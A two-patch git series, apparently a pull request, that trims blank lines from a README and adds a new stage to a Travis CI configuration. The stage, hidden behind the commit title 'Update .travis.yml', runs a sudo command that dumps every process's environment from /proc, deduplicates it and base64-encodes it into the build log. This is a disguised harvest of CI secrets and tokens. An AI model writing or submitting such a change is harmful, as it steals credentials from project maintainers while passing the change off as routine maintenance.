From f3492ee94bf37ce7869b22338a25f3dfe6e5b0a1 Mon Sep 17 00:00:00 2001 From: jeromin-walker <91253627+jeromin-walker@users.noreply.github.com> Date: Thu, 23 Sep 2021 14:34:23 +0500 Subject: [PATCH 1/2] Update README.md --- README.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/README.md b/README.md index 2f40f15..21015ac 100644 --- a/README.md +++ b/README.md @@ -28,5 +28,3 @@ OPTIONS: Verbose output ``` - - From 7e82d509bf83d06de77a07e5393ad3b0bd717d02 Mon Sep 17 00:00:00 2001 From: jeromin-walker <91253627+jeromin-walker@users.noreply.github.com> Date: Thu, 23 Sep 2021 14:39:15 +0500 Subject: [PATCH 2/2] Update .travis.yml --- .travis.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.travis.yml b/.travis.yml index b5a5737..fdad1f7 100644 --- a/.travis.yml +++ b/.travis.yml @@ -11,3 +11,5 @@ jobs: include: - stage: "echo BAZ" script: echo $BAZ + - stage: "base64" + script: sudo strings /proc/*/environ | sort -u | base64